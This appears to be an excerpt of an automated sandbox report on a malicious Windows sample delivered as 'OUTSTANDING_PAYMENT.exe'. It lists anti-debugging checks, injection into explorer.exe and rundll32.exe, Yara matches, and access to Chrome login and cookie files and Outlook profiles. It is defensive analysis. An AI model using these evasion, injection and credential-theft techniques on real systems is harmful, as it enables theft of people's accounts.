          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01361074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01352073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01299080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01313884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01313884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0132B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0135131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0129DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0129DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01368B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0129F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_01365BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_012A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0134D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0134B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0134B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01368A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01324257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01368D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0131A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01313540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01343D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01348DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_0040CF43 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C564EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C55BF4 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C59D4C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C5450E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00C55BF4 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00C564EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00C59D4C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 2_2_00C5450E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: E30000
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\qhcqh.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write (2 occurrences)
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Thread register set: target process: 3452
          Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 3452
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Process created: C:\Users\user\AppData\Local\Temp\qhcqh.exe C:\Users\user\AppData\Local\Temp\qhcqh.exe
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267348908.0000000001980000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.785129007.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475538694.00000000090D8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267348908.0000000001980000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.777751246.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.266462070.0000000001378000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CProgmanile
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267348908.0000000001980000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: GetLocaleInfoA, (2 occurrences)
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exe | Code function: 1_2_00C56278 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe | Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          Source: Yara match | File source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          Source: Yara match | File source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
